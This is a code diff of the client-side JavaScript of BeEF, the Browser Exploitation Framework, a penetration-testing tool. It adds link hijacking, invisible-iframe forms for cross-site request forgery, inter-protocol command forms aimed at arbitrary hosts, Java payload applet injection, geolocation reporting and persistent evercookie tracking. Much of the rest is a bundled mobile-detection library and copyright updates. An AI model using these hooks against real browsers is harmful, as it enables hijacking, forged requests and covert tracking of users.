+	 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
+	 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
+	 * @param: {String} url: the url to be rewritten
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteLinksClickEvents: function(url, selector) {
+		var sel = (selector == null) ? 'a' : selector;
+		return $j(sel).each(function() {
+			if ($j(this).attr('href') != null)
+			{
+				$j(this).click(function() {this.href=url});
+			}
+		}).length;
+	},
+
 	/**
      * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
 	 * @param: {String} old_protocol: the old link protocol to be rewritten
@@ -267,7 +384,8 @@ beef.dom = {
 
             if (codebase != null) {
                 content += "<param name='codebase' value='" + codebase + "' />"
-            }else{
+            }
+            if (archive != null){
                 content += "<param name='archive' value='" + archive + "' />";
             }
             if (params != null) {
@@ -275,7 +393,7 @@ beef.dom = {
             }
             content += "</object>";
         }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
 
             if (codebase != null) {
                 content = "" +
@@ -294,24 +412,25 @@ beef.dom = {
             }
             content += "</applet>";
         }
-        if (beef.browser.isFF()) {
-            if (codebase != null) {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            } else {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            }
-
-            if (params != null) {
-                content += beef.dom.parseAppletParams(params);
-            }
-            content += "</embed>";
-        }
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
+//        if (beef.browser.isFF()) {
+//            if (codebase != null) {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            } else {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            }
+//
+//            if (params != null) {
+//                content += beef.dom.parseAppletParams(params);
+//            }
+//            content += "</embed>";
+//        }
         $j('body').append(content);
     },
 
@@ -327,15 +446,17 @@ beef.dom = {
      * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
      * @params: {String} action: the form action attribute, where the request will be sent.
      * @params: {String} method: HTTP method, usually POST.
+     * @params: {String} enctype: form encoding type
      * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
      *         example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
      */
-    createIframeXsrfForm: function(action, method, inputs){
+    createIframeXsrfForm: function(action, method, enctype, inputs){
         var iframeXsrf = beef.dom.createInvisibleIframe();
 
         var formXsrf = document.createElement('form');
-        formXsrf.setAttribute('action', action);
-        formXsrf.setAttribute('method', method);
+        formXsrf.setAttribute('action',  action);
+        formXsrf.setAttribute('method',  method);
+        formXsrf.setAttribute('enctype', enctype);
 
         var input = null;
         for (i in inputs){
@@ -358,11 +479,11 @@ beef.dom = {
      * @params: {String} rport: remote port
      * @params: {String} commands: protocol commands to be executed by the remote host:port service
      */
-    createIframeIpecForm: function(rhost, rport, commands){
+    createIframeIpecForm: function(rhost, rport, path, commands){
         var iframeIpec = beef.dom.createInvisibleIframe();
 
         var formIpec = document.createElement('form');
-        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
         formIpec.setAttribute('method',  'POST');
         formIpec.setAttribute('enctype', 'multipart/form-data');
 

core/main/client/encode/base64.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/encode/json.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/geolocation.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -32,14 +32,14 @@ beef.geolocation = {
 
         $j.ajax({
             error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                 beef.net.send(command_url, command_id, "latitude=" + latitude
                              + "&longitude=" + longitude
                              + "&osm=UNAVAILABLE"
                              + "&geoLocEnabled=True");
                 },
             success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                 var jsonResp = $j.parseJSON(data);
 
                 beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
         navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
         		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                 beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:

core/main/client/hardware.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -7,39 +7,51 @@
 beef.hardware = {
 
 	ua: navigator.userAgent,
-	
-	isWinPhone: function() {
-		return (this.ua.match('(Windows Phone)')) ? true : false;
-	},
-	
-	isIphone: function() {
-		return (this.ua.indexOf('iPhone') != -1) ? true : false;
+
+	cpuType: function() {
+		// IE
+		if (typeof navigator.cpuClass != 'undefined') {
+			cpu = navigator.cpuClass;
+			if (cpu == "x86")   return "32-bit";
+			if (cpu == "68K")   return "Motorola 68K";
+			if (cpu == "PPC")   return "Motorola PPC";
+			if (cpu == "Alpha") return "Digital";
+			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
+			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
+		// Firefox
+        } else if (typeof navigator.oscpu != 'undefined') {
+			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
+		}
+		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
+		return "32-bit";
 	},
 
-	isIpad: function() {
-		return (this.ua.indexOf('iPad') != -1) ? true : false;
+	isTouchEnabled: function() {
+		if ('ontouchstart' in document) return true;
+		return false;
 	},
 
-	isIpod: function() {
-		return (this.ua.indexOf('iPod') != -1) ? true : false;
+	isVirtualMachine: function() {
+		if (screen.width % 2 || screen.height % 2) return true;
+		return false;
+	},
+
+	isLaptop: function() {
+		// Most common laptop screen resolution
+		if (screen.width == 1366 && screen.height == 768) return true;
+		// Netbooks
+		if (screen.width == 1024 && screen.height == 600) return true;
+		return false;
 	},
 
 	isNokia: function() {
 		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
 	},
 
-	isBlackBerry: function() {
-		return (this.ua.match('BlackBerry')) ? true : false;
-	},
-
 	isZune: function() {
 		return (this.ua.match('ZuneWP7')) ? true : false;
 	},
 
-	isKindle: function() {
-		return (this.ua.match('Kindle')) ? true : false;
-	},
-
 	isHtc: function() {
 		return (this.ua.match('HTC')) ? true : false;
 	},
@@ -48,10 +60,6 @@ beef.hardware = {
 		return (this.ua.match('Ericsson')) ? true : false;
 	},
 
-	isNokia: function() {
-		return (this.ua.match('Nokia')) ? true : false;
-	},
-
 	isMotorola: function() {
 		return (this.ua.match('Motorola')) ? true : false;
 	},
@@ -60,23 +68,62 @@ beef.hardware = {
 		return (this.ua.match('Nexus One')) ? true : false;
 	},
 
-	getName: function() {
+        /**
+         * Returns true if the browser is on a Mobile Phone
+         * @return: {Boolean} true or false
+         *
+         * @example: if(beef.hardware.isMobilePhone()) { ... }
+         **/
+        isMobilePhone: function() {
+            return DetectMobileQuick();
+        },
 
-		if (this.isNokia()) return 'Nokia';
-		if (this.isWinPhone()) return 'Windows Phone';
-		if (this.isBlackBerry()) return 'BlackBerry';
-		if (this.isIphone()) return 'iPhone';
-		if (this.isIpad()) return 'iPad';
-		if (this.isIpod()) return 'iPod';
-		if (this.isKindle()) return 'Kindle';
-		if (this.isHtc()) return 'HTC';
-		if (this.isMotorola()) return 'Motorola';
-		if (this.isZune()) return 'Zune';
-		if (this.isGoogle()) return 'Google';
-		if (this.isEricsson()) return 'Ericsson';
+	getName: function() {
+                var ua = navigator.userAgent.toLowerCase();
+                if(DetectIphone())              { return "iPhone"};
+                if(DetectIpod())                { return "iPod Touch"};
+                if(DetectIpad())                { return "iPad"};
+		if (this.isHtc())               { return 'HTC'};
+		if (this.isMotorola())          { return 'Motorola'};
+		if (this.isZune())              { return 'Zune'};
+		if (this.isGoogle())            { return 'Google Nexus One'};
+		if (this.isEricsson())          { return 'Ericsson'};
+                if(DetectAndroidPhone())        { return "Android Phone"};
+                if(DetectAndroidTablet())       { return "Android Tablet"};
+                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
+                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
+                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
+                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
+                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
+		if (this.isNokia())             { return 'Nokia'};
+                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
+                if(DetectWindowsMobile())       { return "Windows Mobile"};
+                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+                if(DetectBlackBerry())          { return "BlackBerry"};
+                if(DetectPalmOS())              { return "Palm OS"};
+                if(DetectPalmWebOS())           { return "Palm Web OS"};
+                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+                if(DetectArchos())              { return "Archos"}
+                if(DetectBrewDevice())          { return "Brew"};
+                if(DetectDangerHiptop())        { return "Danger Hiptop"};
+                if(DetectMaemoTablet())         { return "Maemo Tablet"};
+                if(DetectSonyMylo())            { return "Sony Mylo"};
+                if(DetectAmazonSilk())          { return "Kindle Fire"};
+                if(DetectKindle())              { return "Kindle"};
+                if(DetectSonyPlaystation())                 { return "Playstation"};
+                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
+                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
+                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
+                if(DetectXbox())                            { return "Xbox"};
+				if(this.isLaptop())							{ return "Laptop"};
+                if(this.isVirtualMachine())                 { return "Virtual Machine"};
 
 		return 'Unknown';
 	}
 };
 
-beef.regCmp('beef.net.hardware');
+beef.regCmp('beef.hardware');

core/main/client/init.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -13,7 +13,8 @@
  * and will have a new session id. The new session id will need to know
  * the brwoser details. So sendback the browser details again.
  */
-BEEFHOOK = beef.session.get_hook_session_id();
+
+beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
     beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
             }
             return false;
         }
@@ -46,7 +47,7 @@ window.onclose = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onclose - couldn't execute callback: " + e.message);
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
             }
             return false;
         }

core/main/client/lib/evercookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -793,14 +793,19 @@ this.waitForSwf = function(i)
 
 this.evercookie_cookie = function(name, value)
 {
-	if (typeof(value) != "undefined")
-	{
-		// expire the cookie first
-		document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
-		document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
-	}
-	else
-		return this.getFromStr(name, document.cookie);
+    try{
+        if (typeof(value) != "undefined")
+        {
+            // expire the cookie first
+            document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
+            document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
+        }
+        else
+            return this.getFromStr(name, document.cookie);
+    }catch(e){
+        // the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
+        // evercookie_userdata and evercookie_window will be used in this case.
+    }
 };
 
 // get value from param-like string (eg, "x=y&name=VALUE")

core/main/client/lib/mdetect.js

@@ -0,0 +1,706 @@
+
+/* *******************************************
+// Copyright 2010-2012, Anthony Hand
+// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
+// LICENSE INFORMATION
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//        http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing,
+// software distributed under the License is distributed on an
+// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
+// either express or implied. See the License for the specific
+// language governing permissions and limitations under the License.
+// *******************************************
+*/
+
+var isIphone = false;
+var isAndroidPhone = false;
+var isTierTablet = false;
+var isTierIphone = false;
+var isTierRichCss = false;
+var isTierGenericMobile = false;
+
+var engineWebKit = "webkit";
+var deviceIphone = "iphone";
+var deviceIpod = "ipod";
+var deviceIpad = "ipad";
+var deviceMacPpc = "macintosh"; //Used for disambiguation
+
+var deviceAndroid = "android";
+var deviceGoogleTV = "googletv";
+var deviceXoom = "xoom"; //Motorola Xoom
+var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
+
+var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
+
+var deviceSymbian = "symbian";
+var deviceS60 = "series60";
+var deviceS70 = "series70";
+var deviceS80 = "series80";
+var deviceS90 = "series90";
+
+var deviceWinPhone7 = "windows phone os 7";
+var deviceWinMob = "windows ce";
+var deviceWindows = "windows";
+var deviceIeMob = "iemobile";
+var devicePpc = "ppc"; //Stands for PocketPC
+var enginePie = "wm5 pie";  //An old Windows Mobile
+
+var deviceBB = "blackberry";
+var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
+var deviceBBStorm = "blackberry95"; //Storm 1 and 2
+var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
+var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
+var deviceBBTour = "blackberry96"; //Tour
+var deviceBBCurve = "blackberry89"; //Curve 2
+var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
+var deviceBBTorch = "blackberry 98"; //Torch
+var deviceBBPlaybook = "playbook"; //PlayBook tablet
+
+var devicePalm = "palm";
+var deviceWebOS = "webos"; //For Palm's line of WebOS devices
+var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
+
+var engineBlazer = "blazer"; //Old Palm browser
+var engineXiino = "xiino";
+
+var deviceKindle = "kindle"; //Amazon Kindle, eInk one
+var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
+
+var vndwap = "vnd.wap";
+var wml = "wml";
+
+var deviceTablet = "tablet"; //Generic term for slate and tablet devices
+var deviceBrew = "brew";
+var deviceDanger = "danger";
+var deviceHiptop = "hiptop";
+var devicePlaystation = "playstation";
+var deviceNintendoDs = "nitro";
+var deviceNintendo = "nintendo";
+var deviceWii = "wii";
+var deviceXbox = "xbox";
+var deviceArchos = "archos";
+
+var engineOpera = "opera"; //Popular browser
+var engineNetfront = "netfront"; //Common embedded OS browser
+var engineUpBrowser = "up.browser"; //common on some phones
+var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
+var deviceMidp = "midp"; //a mobile Java technology
+var uplink = "up.link";
+var engineTelecaQ = 'teleca q'; //a modern feature phone browser
+
+var devicePda = "pda";
+var mini = "mini";  //Some mobile browsers put 'mini' in their names.
+var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
+var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
+
+var maemo = "maemo";
+var linux = "linux";
+var qtembedded = "qt embedded"; //for Sony Mylo and others
+var mylocom2 = "com2"; //for Sony Mylo also
+
+var manuSonyEricsson = "sonyericsson";
+var manuericsson = "ericsson";
+var manuSamsung1 = "sec-sgh";
+var manuSony = "sony";
+var manuHtc = "htc"; //Popular Android and WinMo manufacturer
+
+var svcDocomo = "docomo";
+var svcKddi = "kddi";
+var svcVodafone = "vodafone";
+
+var disUpdate = "update"; //pda vs. update
+
+var uagent = "";
+if (navigator && navigator.userAgent)
+    uagent = navigator.userAgent.toLowerCase();
+
+function DetectIphone()
+{
+   if (uagent.search(deviceIphone) > -1)
+   {
+      if (DetectIpad() || DetectIpod())
+         return false;
+      else
+         return true;
+   }
+   else
+      return false;
+}
+
+function DetectIpod()
+{
+   if (uagent.search(deviceIpod) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectIpad()
+{
+   if (uagent.search(deviceIpad) > -1  && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+function DetectIphoneOrIpod()
+{
+   if (uagent.search(deviceIphone) > -1 ||
+       uagent.search(deviceIpod) > -1)
+       return true;
+    else
+       return false;
+}
+
+function DetectIos()
+{
+   if (DetectIphoneOrIpod() || DetectIpad())
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroid()
+{
+   if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidPhone()
+{
+   if (DetectAndroid() && (uagent.search(mobile) > -1))
+      return true;
+   if (DetectOperaAndroidPhone())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidTablet()
+{
+   if (!DetectAndroid())
+      return false;
+
+   if (DetectOperaMobile())
+      return false;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return false;
+
+   if (uagent.search(mobile) > -1)
+      return false;
+   else
+      return true;
+}
+
+
+function DetectAndroidWebKit()
+{
+   if (DetectAndroid() && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+
+function DetectGoogleTV()
+{
+   if (uagent.search(deviceGoogleTV) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectWebkit()
+{
+   if (uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectS60OssBrowser()
+{
+   if (DetectWebkit())
+   {
+     if ((uagent.search(deviceS60) > -1 ||
+          uagent.search(deviceSymbian) > -1))
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectSymbianOS()
+{
+   if (uagent.search(deviceSymbian) > -1 ||
+       uagent.search(deviceS60) > -1 ||
+       uagent.search(deviceS70) > -1 ||
+       uagent.search(deviceS80) > -1 ||
+       uagent.search(deviceS90) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsPhone7()
+{
+   if (uagent.search(deviceWinPhone7) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsMobile()
+{
+   if (DetectWindowsPhone7())
+      return false;
+   if (uagent.search(deviceWinMob) > -1 ||
+       uagent.search(deviceIeMob) > -1 ||
+       uagent.search(enginePie) > -1)
+      return true;
+   if ((uagent.search(devicePpc) > -1) &&
+       !(uagent.search(deviceMacPpc) > -1))
+      return true;
+   if (uagent.search(manuHtc) > -1 &&
+       uagent.search(deviceWindows) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerry()
+{
+   if (uagent.search(deviceBB) > -1)
+      return true;
+   if (uagent.search(vndRIM) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTablet()
+{
+   if (uagent.search(deviceBBPlaybook) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryWebKit()
+{
+   if (DetectBlackBerry() &&
+       uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTouch()
+{
+   if (DetectBlackBerry() &&
+        ((uagent.search(deviceBBStorm) > -1) ||
+        (uagent.search(deviceBBTorch) > -1) ||
+        (uagent.search(deviceBBBoldTouch) > -1) ||
+        (uagent.search(deviceBBCurveTouch) > -1) ))
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryHigh()
+{
+   if (DetectBlackBerryWebKit())
+      return false;
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryTouch() ||
+        uagent.search(deviceBBBold) > -1 ||
+        uagent.search(deviceBBTour) > -1 ||
+        uagent.search(deviceBBCurve) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectBlackBerryLow()
+{
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+
+function DetectPalmOS()
+{
+   if (uagent.search(devicePalm) > -1 ||
+       uagent.search(engineBlazer) > -1 ||
+       uagent.search(engineXiino) > -1)
+   {
+     if (DetectPalmWebOS())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+function DetectPalmWebOS()
+{
+   if (uagent.search(deviceWebOS) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWebOSTablet()
+{
+   if (uagent.search(deviceWebOShp) > -1 &&
+       uagent.search(deviceTablet) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectGarminNuvifone()
+{
+   if (uagent.search(deviceNuvifone) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectSmartphone()
+{
+   if (DetectIphoneOrIpod()
+      || DetectAndroidPhone()
+      || DetectS60OssBrowser()
+      || DetectSymbianOS()
+      || DetectWindowsMobile()
+      || DetectWindowsPhone7()
+      || DetectBlackBerry()
+      || DetectPalmWebOS()
+      || DetectPalmOS()
+      || DetectGarminNuvifone())
+      return true;
+
+   return false;
+};
+
+function DetectArchos()
+{
+   if (uagent.search(deviceArchos) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBrewDevice()
+{
+   if (uagent.search(deviceBrew) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectDangerHiptop()
+{
+   if (uagent.search(deviceDanger) > -1 ||
+       uagent.search(deviceHiptop) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMaemoTablet()
+{
+   if (uagent.search(maemo) > -1)
+      return true;
+   if ((uagent.search(linux) > -1)
+       && (uagent.search(deviceTablet) > -1)
+       && !DetectWebOSTablet()
+       && !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyMylo()
+{
+   if (uagent.search(manuSony) > -1)
+   {
+     if (uagent.search(qtembedded) > -1 ||
+         uagent.search(mylocom2) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaMobile()
+{
+   if (uagent.search(engineOpera) > -1)
+   {
+     if (uagent.search(mini) > -1 ||
+         uagent.search(mobi) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaAndroidPhone()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(mobi) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectOperaAndroidTablet()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(deviceTablet) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyPlaystation()
+{
+   if (uagent.search(devicePlaystation) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectNintendo()
+{
+   if (uagent.search(deviceNintendo) > -1   ||
+	uagent.search(deviceWii) > -1 ||
+	uagent.search(deviceNintendoDs) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectXbox()
+{
+   if (uagent.search(deviceXbox) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectGameConsole()
+{
+   if (DetectSonyPlaystation())
+      return true;
+   if (DetectNintendo())
+      return true;
+   if (DetectXbox())
+      return true;
+   else
+      return false;
+};
+
+function DetectKindle()
+{
+   if (uagent.search(deviceKindle) > -1 &&
+       !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectAmazonSilk()
+{
+   if (uagent.search(engineSilk) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMobileQuick()
+{
+   if (DetectTierTablet())
+      return false;
+
+   if (DetectSmartphone())
+      return true;
+
+   if (uagent.search(deviceMidp) > -1 ||
+	DetectBrewDevice())
+      return true;
+
+   if (DetectOperaMobile())
+      return true;
+
+   if (uagent.search(engineNetfront) > -1)
+      return true;
+   if (uagent.search(engineUpBrowser) > -1)
+      return true;
+   if (uagent.search(engineOpenWeb) > -1)
+      return true;
+
+   if (DetectDangerHiptop())
+      return true;
+
+   if (DetectMaemoTablet())
+      return true;
+   if (DetectArchos())
+      return true;
+
+   if ((uagent.search(devicePda) > -1) &&
+        !(uagent.search(disUpdate) > -1))
+      return true;
+   if (uagent.search(mobile) > -1)
+      return true;
+
+   if (DetectKindle() ||
+       DetectAmazonSilk())
+      return true;
+
+   return false;
+};
+
+
+function DetectMobileLong()
+{
+   if (DetectMobileQuick())
+      return true;
+   if (DetectGameConsole())
+      return true;
+   if (DetectSonyMylo())
+      return true;
+
+   if (uagent.search(manuSamsung1) > -1 ||
+	uagent.search(manuSonyEricsson) > -1 ||
+	uagent.search(manuericsson) > -1)
+      return true;
+
+   if (uagent.search(svcDocomo) > -1)
+      return true;
+   if (uagent.search(svcKddi) > -1)
+      return true;
+   if (uagent.search(svcVodafone) > -1)
+      return true;
+
+
+   return false;
+};
+
+
+function DetectTierTablet()
+{
+   if (DetectIpad()
+        || DetectAndroidTablet()
+        || DetectBlackBerryTablet()
+        || DetectWebOSTablet())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierIphone()
+{
+   if (DetectIphoneOrIpod())
+      return true;
+   if (DetectAndroidPhone())
+      return true;
+   if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
+      return true;
+   if (DetectWindowsPhone7())
+      return true;
+   if (DetectPalmWebOS())
+      return true;
+   if (DetectGarminNuvifone())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierRichCss()
+{
+    if (DetectMobileQuick())
+    {
+       if (DetectTierIphone() || DetectKindle())
+          return false;
+
+       if (DetectWebkit())
+          return true;
+       if (DetectS60OssBrowser())
+          return true;
+
+       if (DetectBlackBerryHigh())
+          return true;
+
+       if (DetectWindowsMobile())
+          return true;
+
+       if (uagent.search(engineTelecaQ) > -1)
+          return true;
+
+       else
+          return false;
+    }
+    else
+      return false;
+};
+
+function DetectTierOtherPhones()
+{
+    if (DetectMobileLong())
+    {
+       if (DetectTierIphone() || DetectTierRichCss())
+          return false;
+
+       else
+          return true;
+    }
+    else
+      return false;
+};
+
+
+function InitDeviceScan()
+{
+    isIphone = DetectIphoneOrIpod();
+    isAndroidPhone = DetectAndroidPhone();
+    isTierIphone = DetectTierIphone();
+    isTierTablet = DetectTierTablet();
+
+    isTierRichCss = DetectTierRichCss();
+    isTierGenericMobile = DetectTierOtherPhones();
+};
+
+InitDeviceScan()

core/main/client/logger.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -43,6 +43,7 @@ beef.logger = {
         this.y = 0;
         this.target = null;
         this.data = null;
+        this.mods = null;
     },
 	
 	/**
